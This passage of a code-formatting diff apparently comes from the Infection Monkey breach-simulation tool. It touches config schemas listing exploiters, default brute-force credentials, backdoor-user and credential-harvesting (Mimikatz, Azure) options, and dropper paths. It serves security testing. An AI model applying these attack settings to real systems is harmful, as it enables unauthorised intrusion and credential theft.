ENCRYPTED_CONFIG_VALUES] for key in keys: - if isinstance(flat_config[key], collections.Sequence) and not isinstance(flat_config[key], str): + if isinstance(flat_config[key], collections.Sequence) and not isinstance( + flat_config[key], str + ): # Check if we are decrypting ssh key pair - if flat_config[key] and isinstance(flat_config[key][0], dict) and 'public_key' in flat_config[key][0]: - flat_config[key] = [ConfigService.decrypt_ssh_key_pair(item) for item in flat_config[key]] + if ( + flat_config[key] + and isinstance(flat_config[key][0], dict) + and "public_key" in flat_config[key][0] + ): + flat_config[key] = [ + ConfigService.decrypt_ssh_key_pair(item) for item in flat_config[key] + ] else: flat_config[key] = [get_encryptor().dec(item) for item in flat_config[key]] else: @@ -316,23 +338,33 @@ class ConfigService: if isinstance(config_arr, collections.Sequence) and not isinstance(config_arr, str): for i in range(len(config_arr)): # Check if array of shh key pairs and then decrypt - if isinstance(config_arr[i], dict) and 'public_key' in config_arr[i]: - config_arr[i] = ConfigService.decrypt_ssh_key_pair(config_arr[i]) if is_decrypt else \ - ConfigService.decrypt_ssh_key_pair(config_arr[i], True) + if isinstance(config_arr[i], dict) and "public_key" in config_arr[i]: + config_arr[i] = ( + ConfigService.decrypt_ssh_key_pair(config_arr[i]) + if is_decrypt + else ConfigService.decrypt_ssh_key_pair(config_arr[i], True) + ) else: - config_arr[i] = get_encryptor().dec(config_arr[i]) if is_decrypt else get_encryptor().enc(config_arr[i]) + config_arr[i] = ( + get_encryptor().dec(config_arr[i]) + if is_decrypt + else get_encryptor().enc(config_arr[i]) + ) else: - parent_config_arr[config_arr_as_array[-1]] = \ - get_encryptor().dec(config_arr) if is_decrypt else get_encryptor().enc(config_arr) + parent_config_arr[config_arr_as_array[-1]] = ( + get_encryptor().dec(config_arr) + if is_decrypt + else get_encryptor().enc(config_arr) + ) @staticmethod def decrypt_ssh_key_pair(pair, encrypt=False): if encrypt: - pair['public_key'] = get_encryptor().enc(pair['public_key']) - pair['private_key'] = get_encryptor().enc(pair['private_key']) + pair["public_key"] = get_encryptor().enc(pair["public_key"]) + pair["private_key"] = get_encryptor().enc(pair["private_key"]) else: - pair['public_key'] = get_encryptor().dec(pair['public_key']) - pair['private_key'] = get_encryptor().dec(pair['private_key']) + pair["public_key"] = get_encryptor().dec(pair["public_key"]) + pair["private_key"] = get_encryptor().dec(pair["private_key"]) return pair @staticmethod diff --git a/monkey/monkey_island/cc/services/config_schema/basic.py b/monkey/monkey_island/cc/services/config_schema/basic.py index 0fa0b80d4..aaf2e570e 100644 --- a/monkey/monkey_island/cc/services/config_schema/basic.py +++ b/monkey/monkey_island/cc/services/config_schema/basic.py @@ -12,9 +12,7 @@ BASIC = { "title": "Exploiters", "type": "array", "uniqueItems": True, - "items": { - "$ref": "#/definitions/exploiter_classes" - }, + "items": {"$ref": "#/definitions/exploiter_classes"}, "default": [ "SmbExploiter", "WmiExploiter", @@ -27,10 +25,10 @@ BASIC = { "HadoopExploiter", "VSFTPDExploiter", "MSSQLExploiter", - "DrupalExploiter" - ] + "DrupalExploiter", + ], } - } + }, }, "credentials": { "title": "Credentials", @@ -40,24 +38,16 @@ BASIC = { "title": "Exploit user list", "type": "array", "uniqueItems": True, - "items": { - "type": "string" - }, - "default": [ - "Administrator", - "root", - "user" - ], + "items": {"type": "string"}, + "default": ["Administrator", "root", "user"], "description": "List of user names that will be used by exploiters that need credentials, like " - "SSH brute-forcing." + "SSH brute-forcing.", }, "exploit_password_list": { "title": "Exploit password list", "type": "array", "uniqueItems": True, - "items": { - "type": "string" - }, + "items": {"type": "string"}, "default": [ "root", "123456", @@ -65,12 +55,12 @@ BASIC = { "123456789", "qwerty", "111111", - "iloveyou" + "iloveyou", ], "description": "List of passwords that will be used by exploiters that need credentials, like " - "SSH brute-forcing." - } - } - } - } + "SSH brute-forcing.", + }, + }, + }, + }, } diff --git a/monkey/monkey_island/cc/services/config_schema/basic_network.py b/monkey/monkey_island/cc/services/config_schema/basic_network.py index 5ae044d95..c515a8cbc 100644 --- a/monkey/monkey_island/cc/services/config_schema/basic_network.py +++ b/monkey/monkey_island/cc/services/config_schema/basic_network.py @@ -17,49 +17,42 @@ BASIC_NETWORK = { "type": "string", "format": IP, }, - "default": [ - ], + "default": [], "description": "List of IPs that the Monkey will not scan.", - "info": "The Monkey scans its subnet if \"Local network scan\" is ticked. " - "Additionally the monkey scans machines according to \"Scan target list\"." + "info": 'The Monkey scans its subnet if "Local network scan" is ticked. ' + 'Additionally the monkey scans machines according to "Scan target list".', }, "local_network_scan": { "title": "Local network scan", "type": "boolean", "default": True, "description": "Determines whether the Monkey will scan the local subnets of machines it runs on, " - "in addition to the IPs that are configured manually in the \"Scan target list\"." + 'in addition to the IPs that are configured manually in the "Scan target list".', }, "depth": { "title": "Scan depth", "type": "integer", "minimum": 1, "default": 2, - "description": - "Amount of hops allowed for the Monkey to spread from the Island server. \n" - + WARNING_SIGN - + " Note that setting this value too high may result in the Monkey propagating too far, " - "if the \"Local network scan\" is enabled." + "description": "Amount of hops allowed for the Monkey to spread from the Island server. \n" + + WARNING_SIGN + + " Note that setting this value too high may result in the Monkey propagating too far, " + 'if the "Local network scan" is enabled.', }, "subnet_scan_list": { "title": "Scan target list", "type": "array", "uniqueItems": True, - "items": { - "type": "string", - "format": IP_RANGE - }, - "default": [ - ], - "description": - "List of targets the Monkey will try to scan. Targets can be IPs, subnets or hosts." - " Examples:\n" - "\tTarget a specific IP: \"192.168.0.1\"\n" - "\tTarget a subnet using a network range: \"192.168.0.5-192.168.0.20\"\n" - "\tTarget a subnet using an IP mask: \"192.168.0.5/24\"\n" - "\tTarget a specific host: \"printer.example\"" - } - } + "items": {"type": "string", "format": IP_RANGE}, + "default": [], + "description": "List of targets the Monkey will try to scan. Targets can be IPs, subnets or hosts." + " Examples:\n" + '\tTarget a specific IP: "192.168.0.1"\n' + '\tTarget a subnet using a network range: "192.168.0.5-192.168.0.20"\n' + '\tTarget a subnet using an IP mask: "192.168.0.5/24"\n' + '\tTarget a specific host: "printer.example"', + }, + }, }, "network_analysis": { "title": "Network Analysis", @@ -69,27 +62,22 @@ BASIC_NETWORK = { "title": "Network segmentation testing", "type": "array", "uniqueItems": True, - "items": { - "type": "string", - "format": IP_RANGE - }, - "default": [ - ], - "description": - "Test for network segmentation by providing a list of network segments " - "that should NOT be accessible to each other.\n\n" - "For example, if you configured the following three segments: " - "\"10.0.0.0/24\", \"11.0.0.2/32\", and \"12.2.3.0/24\", " - "a Monkey running on 10.0.0.5 will try to access machines in the following subnets: " - "11.0.0.2/32, 12.2.3.0/24. An alert on successful cross-segment connections " - "will be shown in the reports. \n\n" - "Network segments can be IPs, subnets or hosts. Examples:\n" - "\tDefine a single-IP segment: \"192.168.0.1\"\n" - "\tDefine a segment using a network range: \"192.168.0.5-192.168.0.20\"\n" - "\tDefine a segment using an subnet IP mask: \"192.168.0.5/24\"\n" - "\tDefine a single-host segment: \"printer.example\"" + "items": {"type": "string", "format": IP_RANGE}, + "default": [], + "description": "Test for network segmentation by providing a list of network segments " + "that should NOT be accessible to each other.\n\n" + "For example, if you configured the following three segments: " + '"10.0.0.0/24", "11.0.0.2/32", and "12.2.3.0/24", ' + "a Monkey running on 10.0.0.5 will try to access machines in the following subnets: " + "11.0.0.2/32, 12.2.3.0/24. An alert on successful cross-segment connections " + "will be shown in the reports. \n\n" + "Network segments can be IPs, subnets or hosts. Examples:\n" + '\tDefine a single-IP segment: "192.168.0.1"\n' + '\tDefine a segment using a network range: "192.168.0.5-192.168.0.20"\n' + '\tDefine a segment using an subnet IP mask: "192.168.0.5/24"\n' + '\tDefine a single-host segment: "printer.example"', } - } - } - } + }, + }, + }, } diff --git a/monkey/monkey_island/cc/services/config_schema/config_schema.py b/monkey/monkey_island/cc/services/config_schema/config_schema.py index 17d7752c0..3900b0675 100644 --- a/monkey/monkey_island/cc/services/config_schema/config_schema.py +++ b/monkey/monkey_island/cc/services/config_schema/config_schema.py @@ -2,9 +2,12 @@ from monkey_island.cc.services.config_schema.basic import BASIC from monkey_island.cc.services.config_schema.basic_network import BASIC_NETWORK from monkey_island.cc.services.config_schema.definitions.exploiter_classes import EXPLOITER_CLASSES from monkey_island.cc.services.config_schema.definitions.finger_classes import FINGER_CLASSES -from monkey_island.cc.services.config_schema.definitions.post_breach_actions import POST_BREACH_ACTIONS -from monkey_island.cc.services.config_schema.definitions.system_info_collector_classes import \ - SYSTEM_INFO_COLLECTOR_CLASSES +from monkey_island.cc.services.config_schema.definitions.post_breach_actions import ( + POST_BREACH_ACTIONS, +) +from monkey_island.cc.services.config_schema.definitions.system_info_collector_classes import ( + SYSTEM_INFO_COLLECTOR_CLASSES, +) from monkey_island.cc.services.config_schema.internal import INTERNAL from monkey_island.cc.services.config_schema.monkey import MONKEY @@ -18,8 +21,7 @@ SCHEMA = { "exploiter_classes": EXPLOITER_CLASSES, "system_info_collector_classes": SYSTEM_INFO_COLLECTOR_CLASSES, "post_breach_actions": POST_BREACH_ACTIONS, - "finger_classes": FINGER_CLASSES - + "finger_classes": FINGER_CLASSES, }, "properties": { "basic": BASIC, @@ -27,7 +29,5 @@ SCHEMA = { "monkey": MONKEY, "internal": INTERNAL, }, - "options": { - "collapsed": True - } + "options": {"collapsed": True}, } diff --git a/monkey/monkey_island/cc/services/config_schema/definitions/finger_classes.py b/monkey/monkey_island/cc/services/config_schema/definitions/finger_classes.py index 427c72bb3..c5de894d4 100644 --- a/monkey/monkey_island/cc/services/config_schema/definitions/finger_classes.py +++ b/monkey/monkey_island/cc/services/config_schema/definitions/finger_classes.py @@ -1,85 +1,69 @@ FINGER_CLASSES = { "title": "Fingerprint class", "description": "Fingerprint modules collect info about external services " - "Infection Monkey scans.", + "Infection Monkey scans.", "type": "string", "anyOf": [ { "type": "string", - "enum": [ - "SMBFinger" - ], + "enum": ["SMBFinger"], "title": "SMBFinger", "safe": True, "info": "Figures out if SMB is running and what's the version of it.", - "attack_techniques": ["T1210"] + "attack_techniques": ["T1210"], }, { "type": "string", - "enum": [ - "SSHFinger" - ], + "enum": ["SSHFinger"], "title": "SSHFinger", "safe": True, "info": "Figures out if SSH is running.", - "attack_techniques": ["T1210"] + "attack_techniques": ["T1210"], }, { "type": "string", - "enum": [ - "PingScanner" - ], + "enum": ["PingScanner"], "title": "PingScanner", "safe": True, - "info": "Tries to identify if host is alive and which OS it's running by ping scan." + "info": "Tries to identify if host is alive and which OS it's running by ping scan.", }, { "type": "string", - "enum": [ - "HTTPFinger" - ], + "enum": ["HTTPFinger"], "title": "HTTPFinger", "safe": True, - "info": "Checks if host has HTTP/HTTPS ports open." + "info": "Checks if host has HTTP/HTTPS ports open.", }, { "type": "string", - "enum": [ - "MySQLFinger" - ], + "enum": ["MySQLFinger"], "title": "MySQLFinger", "safe": True, "info": "Checks if MySQL server is running and tries to get it's version.", - "attack_techniques": ["T1210"] + "attack_techniques": ["T1210"], }, { "type": "string", - "enum": [ - "MSSQLFinger" - ], + "enum": ["MSSQLFinger"], "title": "MSSQLFinger", "safe": True, "info": "Checks if Microsoft SQL service is running and tries to gather information about it.", - "attack_techniques": ["T1210"] + "attack_techniques": ["T1210"], }, { "type": "string", - "enum": [ - "ElasticFinger" - ], + "enum": ["ElasticFinger"], "title": "ElasticFinger", "safe": True, "info": "Checks if ElasticSearch is running and attempts to find it's version.", - "attack_techniques": ["T1210"] + "attack_techniques": ["T1210"], }, { "type": "string", - "enum": [ - "PostgreSQLFinger" - ], + "enum": ["PostgreSQLFinger"], "title": "PostgreSQLFinger", "info": "Checks if PostgreSQL service is running and if its communication is encrypted.", - "attack_techniques": ["T1210"] - } - ] + "attack_techniques": ["T1210"], + }, + ], } diff --git a/monkey/monkey_island/cc/services/config_schema/definitions/post_breach_actions.py b/monkey/monkey_island/cc/services/config_schema/definitions/post_breach_actions.py index 857e80da4..ea9b18aba 100644 --- a/monkey/monkey_island/cc/services/config_schema/definitions/post_breach_actions.py +++ b/monkey/monkey_island/cc/services/config_schema/definitions/post_breach_actions.py @@ -1,123 +1,101 @@ POST_BREACH_ACTIONS = { "title": "Post breach actions", "description": "Runs scripts/commands on infected machines. These actions safely simulate what an adversary" - "might do after breaching a new machine. Used in ATT&CK and Zero trust reports.", + "might do after breaching a new machine. Used in ATT&CK and Zero trust reports.", "type": "string", "anyOf": [ { "type": "string", - "enum": [ - "BackdoorUser" - ], + "enum": ["BackdoorUser"], "title": "Back door user", "safe": True, "info": "Attempts to create a new user on the system and delete it afterwards.", - "attack_techniques": ["T1136"] + "attack_techniques": ["T1136"], }, { "type": "string", - "enum": [ - "CommunicateAsNewUser" - ], + "enum": ["CommunicateAsNewUser"], "title": "Communicate as new user", "safe": True, "info": "Attempts to create a new user, create HTTPS requests as that user and delete the user " - "afterwards.", - "attack_techniques": ["T1136"] + "afterwards.", + "attack_techniques": ["T1136"], }, { "type": "string", - "enum": [ - "ModifyShellStartupFiles" - ], + "enum": ["ModifyShellStartupFiles"], "title": "Modify shell startup files", "safe": True, "info": "Attempts to modify shell startup files, like ~/.profile, ~/.bashrc, ~/.bash_profile " - "in linux, and profile.ps1 in windows. Reverts modifications done afterwards.", - "attack_techniques": ["T1156", "T1504"] + "in linux, and profile.ps1 in windows. Reverts modifications done afterwards.", + "attack_techniques": ["T1156", "T1504"], }, { "type": "string", - "enum": [ - "HiddenFiles" - ], + "enum": ["HiddenFiles"], "title": "Hidden files and directories", "safe": True, "info": "Attempts to create a hidden file and remove it afterward.", - "attack_techniques": ["T1158"] + "attack_techniques": ["T1158"], }, { "type": "string", - "enum": [ - "TrapCommand" - ], + "enum": ["TrapCommand"], "title": "Trap", "safe": True, "info": "On Linux systems, attempts to trap an interrupt signal in order to execute a command " - "upon receiving that signal. Removes the trap afterwards.", - "attack_techniques": ["T1154"] + "upon receiving that signal. Removes the trap afterwards.", + "attack_techniques": ["T1154"], }, { "type": "string", - "enum": [ - "ChangeSetuidSetgid" - ], + "enum": ["ChangeSetuidSetgid"], "title": "Setuid and Setgid", "safe": True, "info": "On Linux systems, attempts to set the setuid and setgid bits of a new file. " - "Removes the file afterwards.", - "attack_techniques": ["T1166"] + "Removes the file afterwards.", + "attack_techniques": ["T1166"], }, { "type": "string", - "enum": [ - "ScheduleJobs" - ], + "enum": ["ScheduleJobs"], "title": "Job scheduling", "safe": True, "info": "Attempts to create a scheduled job on the system and remove it.", - "attack_techniques": ["T1168", "T1053"] + "attack_techniques": ["T1168", "T1053"], }, { "type": "string", - "enum": [ - "Timestomping" - ], + "enum": ["Timestomping"], "title": "Timestomping", "safe": True, "info": "Creates a temporary file and attempts to modify its time attributes. Removes the file afterwards.", - "attack_techniques": ["T1099"] + "attack_techniques": ["T1099"], }, { "type": "string", - "enum": [ - "SignedScriptProxyExecution" - ], + "enum": ["SignedScriptProxyExecution"], "title": "Signed script proxy execution", "safe": False, "info": "On Windows systems, attempts to execute an arbitrary file " - "with the help of a pre-existing signed script.", - "attack_techniques": ["T1216"] + "with the help of a pre-existing signed script.", + "attack_techniques": ["T1216"], }, { "type": "string", - "enum": [ - "AccountDiscovery" - ], + "enum": ["AccountDiscovery"], "title": "Account Discovery", "safe": True, "info": "Attempts to get a listing of user accounts on the system.", - "attack_techniques": ["T1087"] + "attack_techniques": ["T1087"], }, { "type": "string", - "enum": [ - "ClearCommandHistory" - ], + "enum": ["ClearCommandHistory"], "title": "Clear command history", "safe": False, "info": "Attempts to clear the command history.", - "attack_techniques": ["T1146"] - } - ] + "attack_techniques": ["T1146"], + }, + ], } diff --git a/monkey/monkey_island/cc/services/config_schema/definitions/system_info_collector_classes.py b/monkey/monkey_island/cc/services/config_schema/definitions/system_info_collector_classes.py index cd756ed61..487166ec6 100644 --- a/monkey/monkey_island/cc/services/config_schema/definitions/system_info_collector_classes.py +++ b/monkey/monkey_island/cc/services/config_schema/definitions/system_info_collector_classes.py @@ -1,6 +1,11 @@ -from common.common_consts.system_info_collectors_names import (AWS_COLLECTOR, AZURE_CRED_COLLECTOR, - ENVIRONMENT_COLLECTOR, HOSTNAME_COLLECTOR, - MIMIKATZ_COLLECTOR, PROCESS_LIST_COLLECTOR) +from common.common_consts.system_info_collectors_names import ( + AWS_COLLECTOR, + AZURE_CRED_COLLECTOR, + ENVIRONMENT_COLLECTOR, + HOSTNAME_COLLECTOR, + MIMIKATZ_COLLECTOR, + PROCESS_LIST_COLLECTOR, +) SYSTEM_INFO_COLLECTOR_CLASSES = { "title": "System Information Collectors", @@ -9,63 +14,51 @@ SYSTEM_INFO_COLLECTOR_CLASSES = { "anyOf": [ { "type": "string", - "enum": [ - ENVIRONMENT_COLLECTOR - ], + "enum": [ENVIRONMENT_COLLECTOR], "title": "Environment collector", "safe": True, "info": "Collects information about machine's environment (on premise/GCP/AWS).", - "attack_techniques": ["T1082"] + "attack_techniques": ["T1082"], }, { "type": "string", - "enum": [ - MIMIKATZ_COLLECTOR - ], + "enum": [MIMIKATZ_COLLECTOR], "title": "Mimikatz collector", "safe": True, "info": "Collects credentials from Windows credential manager.", - "attack_techniques": ["T1003", "T1005"] + "attack_techniques": ["T1003", "T1005"], }, { "type": "string", - "enum": [ - AWS_COLLECTOR - ], + "enum": [AWS_COLLECTOR], "title": "AWS collector", "safe": True, "info": "If on AWS, collects more information about the AWS instance currently running on.", - "attack_techniques": ["T1082"] + "attack_techniques": ["T1082"], }, { "type": "string", - "enum": [ - HOSTNAME_COLLECTOR - ], + "enum": [HOSTNAME_COLLECTOR], "title": "Hostname collector", "safe": True, "info": "Collects machine's hostname.", - "attack_techniques": ["T1082", "T1016"] + "attack_techniques": ["T1082", "T1016"], }, { "type": "string", - "enum": [ - PROCESS_LIST_COLLECTOR - ], + "enum": [PROCESS_LIST_COLLECTOR], "title": "Process list collector", "safe": True, "info": "Collects a list of running processes on the machine.", - "attack_techniques": ["T1082"] + "attack_techniques": ["T1082"], }, { "type": "string", - "enum": [ - AZURE_CRED_COLLECTOR - ], + "enum": [AZURE_CRED_COLLECTOR], "title": "Azure credential collector", "safe": True, "info": "Collects password credentials from Azure VMs", - "attack_techniques": ["T1003", "T1005"] - } - ] + "attack_techniques": ["T1003", "T1005"], + }, + ], } diff --git a/monkey/monkey_island/cc/services/config_schema/internal.py b/monkey/monkey_island/cc/services/config_schema/internal.py index a53c8ca4d..890e74efa 100644 --- a/monkey/monkey_island/cc/services/config_schema/internal.py +++ b/monkey/monkey_island/cc/services/config_schema/internal.py @@ -12,29 +12,28 @@ INTERNAL = { "title": "Singleton mutex name", "type": "string", "default": "{2384ec59-0df8-4ab9-918c-843740924a28}", - "description": - "The name of the mutex used to determine whether the monkey is already running" + "description": "The name of the mutex used to determine whether the monkey is already running", }, "keep_tunnel_open_time": { "title": "Keep tunnel open time", "type": "integer", "default": 60, - "description": "Time to keep tunnel open before going down after last exploit (in seconds)" + "description": "Time to keep tunnel open before going down after last exploit (in seconds)", }, "monkey_dir_name": { "title": "Monkey's directory name", "type": "string", "default": r"monkey_dir", - "description": "Directory name for the directory which will contain all of the monkey files" + "description": "Directory name for the directory which will contain all of the monkey files", }, "started_on_island": { "title": "Started on island", "type": "boolean", "default": False, "description": "Was exploitation started from island" - "(did monkey with max depth ran on island)" + "(did monkey with max depth ran on island)", }, - } + }, }, "monkey": { "title": "Monkey", @@ -44,75 +43,60 @@ INTERNAL = { "title": "Max victims to find", "type": "integer", "default": 100, - "description": "Determines the maximum number of machines the monkey is allowed to scan" + "description": "Determines the maximum number of machines the monkey is allowed to scan", }, "victims_max_exploit": { "title": "Max victims to exploit", "type": "integer", "default": 100, - "description": - "Determines the maximum number of machines the monkey" - " is allowed to successfully exploit. " + WARNING_SIGN - + " Note that setting this value too high may result in the monkey propagating to " - "a high number of machines" + "description": "Determines the maximum number of machines the monkey" + " is allowed to successfully exploit. " + + WARNING_SIGN + + " Note that setting this value too high may result in the monkey propagating to " + "a high number of machines", }, "internet_services": { "title": "Internet services", "type": "array", "uniqueItems": True, - "items": { - "type": "string" - }, - "default": [ - "monkey.guardicore.com", - "www.google.com" - ], - "description": - "List of internet services to try and communicate with to determine internet" - " connectivity (use either ip or domain)" + "items": {"type": "string"}, + "default": ["monkey.guardicore.com", "www.google.com"], + "description": "List of internet services to try and communicate with to determine internet" + " connectivity (use either ip or domain)", }, "self_delete_in_cleanup": { "title": "Self delete on cleanup", "type": "boolean", "default": True, - "description": "Should the monkey delete its executable when going down" + "description": "Should the monkey delete its executable when going down", }, "use_file_logging": { "title": "Use file logging", "type": "boolean", "default": True, - "description": "Should the monkey dump to a log file" + "description": "Should the monkey dump to a log file", }, "serialize_config": { "title": "Serialize config", "type": "boolean", "default": False, - "description": "Should the monkey dump its config on startup" + "description": "Should the monkey dump its config on startup", }, "alive": { "title": "Alive", "type": "boolean", "default": True, - "description": "Is the monkey alive" + "description": "Is the monkey alive", }, "aws_keys": { "type": "object", "properties": { - "aws_access_key_id": { - "type": "string", - "default": "" - }, - "aws_secret_access_key": { - "type": "string", - "default": "" - }, - "aws_session_token": { - "type": "string", - "default": "" - } - } - } - } + "aws_access_key_id": {"type": "string", "default": ""}, + "aws_secret_access_key": {"type": "string", "default": ""}, + "aws_session_token": {"type": "string", "default": ""}, + }, + }, + }, }, "island_server": { "title": "Island server", @@ -122,22 +106,18 @@ INTERNAL = { "title": "Island server's IP's", "type": "array", "uniqueItems": True, - "items": { - "type": "string" - }, - "default": [ - "192.0.2.0:5000" - ], + "items": {"type": "string"}, + "default": ["192.0.2.0:5000"], "description": "List of command servers/network interfaces to try to communicate with " - "(format is :)" + "(format is :)", }, "current_server": { "title": "Current server", "type": "string", "default": "192.0.2.0:5000", - "description": "The current command server the monkey is communicating with" - } - } + "description": "The current command server the monkey is communicating with", + }, + }, }, "network": { "title": "Network", @@ -151,26 +131,15 @@ INTERNAL = { "title": "HTTP ports", "type": "array", "uniqueItems": True, - "items": { - "type": "integer" - }, - "default": [ - 80, - 8080, - 443, - 8008, - 7001, - 9200 - ], - "description": "List of ports the monkey will check if are being used for HTTP" + "items": {"type": "integer"}, + "default": [80, 8080, 443, 8008, 7001, 9200], + "description": "List of ports the monkey will check if are being used for HTTP", }, "tcp_target_ports": { "title": "TCP target ports", "type": "array", "uniqueItems": True, - "items": { - "type": "integer" - }, + "items": {"type": "integer"}, "default": [ 22, 2222, @@ -183,29 +152,29 @@ INTERNAL = { 8008, 3306, 7001, - 8088 + 8088, ], - "description": "List of TCP ports the monkey will check whether they're open" + "description": "List of TCP ports the monkey will check whether they're open", }, "tcp_scan_interval": { "title": "TCP scan interval", "type": "integer", "default": 0, - "description": "Time to sleep (in milliseconds) between scans" + "description": "Time to sleep (in milliseconds) between scans", }, "tcp_scan_timeout": { "title": "TCP scan timeout", "type": "integer", "default": 3000, - "description": "Maximum time (in milliseconds) to wait for TCP response" + "description": "Maximum time (in milliseconds) to wait for TCP response", }, "tcp_scan_get_banner": { "title": "TCP scan - get banner", "type": "boolean", "default": True, - "description": "Determines whether the TCP scan should try to get the banner" - } - } + "description": "Determines whether the TCP scan should try to get the banner", + }, + }, }, "ping_scanner": { "title": "Ping scanner", @@ -215,11 +184,11 @@ INTERNAL = { "title": "Ping scan timeout", "type": "integer", "default": 1000, - "description": "Maximum time (in milliseconds) to wait for ping response" + "description": "Maximum time (in milliseconds) to wait for ping response", } - } - } - } + }, + }, + }, }, "classes": { "title": "Classes", @@ -229,9 +198,7 @@ INTERNAL = { "title": "Fingerprint classes", "type": "array", "uniqueItems": True, - "items": { - "$ref": "#/definitions/finger_classes" - }, + "items": {"$ref": "#/definitions/finger_classes"}, "default": [ "SMBFinger", "SSHFinger", @@ -240,10 +207,10 @@ INTERNAL = { "MySQLFinger", "MSSQLFinger", "ElasticFinger", - "PostgreSQLFinger" - ] + "PostgreSQLFinger", + ], } - } + }, }, "kill_file": { "title": "Kill file", @@ -253,15 +220,15 @@ INTERNAL = { "title": "Kill file path on Windows", "type": "string", "default": "%windir%\\monkey.not", - "description": "Path of file which kills monkey if it exists (on Windows)" + "description": "Path of file which kills monkey if it exists (on Windows)", }, "kill_file_path_linux": { "title": "Kill file path on Linux", "type": "string", "default": "/var/run/monkey.not", - "description": "Path of file which kills monkey if it exists (on Linux)" - } - } + "description": "Path of file which kills monkey if it exists (on Linux)", + }, + }, }, "dropper": { "title": "Dropper", @@ -271,55 +238,51 @@ INTERNAL = { "title": "Dropper sets date", "type": "boolean", "default": True, - "description": - "Determines whether the dropper should set the monkey's file date to be the same as" - " another file" + "description": "Determines whether the dropper should set the monkey's file date to be the same as" + " another file", }, "dropper_date_reference_path_windows": { "title": "Dropper date reference path (Windows)", "type": "string", "default": "%windir%\\system32\\kernel32.dll", - "description": - "Determines which file the dropper should copy the date from if it's configured to do" - " so on Windows (use fullpath)" + "description": "Determines which file the dropper should copy the date from if it's configured to do" + " so on Windows (use fullpath)", }, "dropper_date_reference_path_linux": { "title": "Dropper date reference path (Linux)", "type": "string", "default": "/bin/sh", - "description": - "Determines which file the dropper should copy the date from if it's configured to do" - " so on Linux (use fullpath)" + "description": "Determines which file the dropper should copy the date from if it's configured to do" + " so on Linux (use fullpath)", }, "dropper_target_path_linux": { "title": "Dropper target path on Linux", "type": "string", "default": "/tmp/monkey", - "description": "Determines where should the dropper place the monkey on a Linux machine" + "description": "Determines where should the dropper place the monkey on a Linux machine", }, "dropper_target_path_win_32": { "title": "Dropper target path on Windows (32bit)", "type": "string", "default": "C:\\Windows\\temp\\monkey32.exe", "description": "Determines where should the dropper place the monkey on a Windows machine " - "(32bit)" + "(32bit)", }, "dropper_target_path_win_64": { "title": "Dropper target path on Windows (64bit)", "type": "string", "default": "C:\\Windows\\temp\\monkey64.exe", "description": "Determines where should the dropper place the monkey on a Windows machine " - "(64 bit)" + "(64 bit)", }, "dropper_try_move_first": { "title": "Try to move first", "type": "boolean", "default": True, - "description": - "Determines whether the dropper should try to move itself instead of copying itself" - " to target path" - } - } + "description": "Determines whether the dropper should try to move itself instead of copying itself" + " to target path", + }, + }, }, "logging": { "title": "Logging", @@ -329,33 +292,33 @@ INTERNAL = { "title": "Dropper log file path on Linux", "type": "string", "default": "/tmp/user-1562", - "description": "The fullpath of the dropper log file on Linux" + "description": "The fullpath of the dropper log file on Linux", }, "dropper_log_path_windows": { "title": "Dropper log file path on Windows", "type": "string", "default": "%temp%\\~df1562.tmp", - "description": "The fullpath of the dropper log file on Windows" + "description": "The fullpath of the dropper log file on Windows", }, "monkey_log_path_linux": { "title": "Monkey log file path on Linux", "type": "string", "default": "/tmp/user-1563", - "description": "The fullpath of the monkey log file on Linux" + "description": "The fullpath of the monkey log file on Linux", }, "monkey_log_path_windows": { "title": "Monkey log file path on Windows", "type": "string", "default": "%temp%\\~df1563.tmp", - "description": "The fullpath of the monkey log file on Windows" + "description": "The fullpath of the monkey log file on Windows", }, "send_log_to_server": { "title": "Send log to server", "type": "boolean", "default": True, - "description": "Determines whether the monkey sends its log to the Monkey Island server" - } - } + "description": "Determines whether the monkey sends its log to the Monkey Island server", + }, + }, }, "exploits": { "title": "Exploits", @@ -365,32 +328,27 @@ INTERNAL = { "title": "Exploit LM hash list", "type": "array", "uniqueItems": True, - "items": { - "type": "string" - }, + "items": {"type": "string"}, "default": [], - "description": "List of LM hashes to use on exploits using credentials" + "description": "List of LM hashes to use on exploits using credentials", }, "exploit_ntlm_hash_list": { "title": "Exploit NTLM hash list", "type": "array", "uniqueItems": True, - "items": { - "type": "string" - }, + "items": {"type": "string"}, "default": [], - "description": "List of NTLM hashes to use on exploits using credentials" + "description": "List of NTLM hashes to use on exploits using credentials", }, "exploit_ssh_keys": { "title": "SSH key pairs list", "type": "array", "uniqueItems": True, "default": [], - "items": { - "type": "string" - }, - "description": "List of SSH key pairs to use, when trying to ssh into servers" - }, "general": { + "items": {"type": "string"}, + "description": "List of SSH key pairs to use, when trying to ssh into servers", + }, + "general": { "title": "General", "type": "object", "properties": { @@ -399,9 +357,9 @@ INTERNAL = { "type": "boolean", "default": False, "description": "Determines whether the monkey should skip the exploit if the monkey's file" - " is already on the remote machine" + " is already on the remote machine", } - } + }, }, "ms08_067": { "title": "MS08_067", @@ -411,21 +369,21 @@ INTERNAL = { "title": "MS08_067 exploit attempts", "type": "integer", "default": 5, - "description": "Number of attempts to exploit using MS08_067" + "description": "Number of attempts to exploit using MS08_067", }, "user_to_add": { "title": "Remote user", "type": "string", "default": "Monkey_IUSER_SUPPORT", - "description": "Username to add on successful exploit" + "description": "Username to add on successful exploit", }, "remote_user_pass": { "title": "Remote user password", "type": "string", "default": "Password1!", - "description": "Password to use for created user" - } - } + "description": "Password to use for created user", + }, + }, }, "sambacry": { "title": "SambaCry", @@ -435,41 +393,35 @@ INTERNAL = { "title": "SambaCry trigger timeout", "type": "integer", "default": 5, - "description": "Timeout (in seconds) of SambaCry trigger" + "description": "Timeout (in seconds) of SambaCry trigger", }, "sambacry_folder_paths_to_guess": { "title": "SambaCry folder paths to guess", "type": "array", "uniqueItems": True, - "items": { - "type": "string" - }, + "items": {"type": "string"}, "default": [ - '/', - '/mnt', - '/tmp', - '/storage', - '/export', - '/share', - '/shares', - '/home' + "/", + "/mnt", + "/tmp", + "/storage", + "/export", + "/share", + "/shares", + "/home", ], - "description": "List of full paths to share folder for SambaCry to guess" + "description": "List of full paths to share folder for SambaCry to guess", }, "sambacry_shares_not_to_check": { "title": "SambaCry shares not to check", "type": "array", "uniqueItems": True, - "items": { - "type": "string" - }, - "default": [ - "IPC$", "print$" - ], - "description": "These shares won't be checked when exploiting with SambaCry" - } - } - } + "items": {"type": "string"}, + "default": ["IPC$", "print$"], + "description": "These shares won't be checked when exploiting with SambaCry", + }, + }, + }, }, "smb_service": { "title": "SMB service", @@ -479,17 +431,16 @@ INTERNAL = { "title": "SMB download timeout", "type": "integer", "default": 300, - "description": - "Timeout 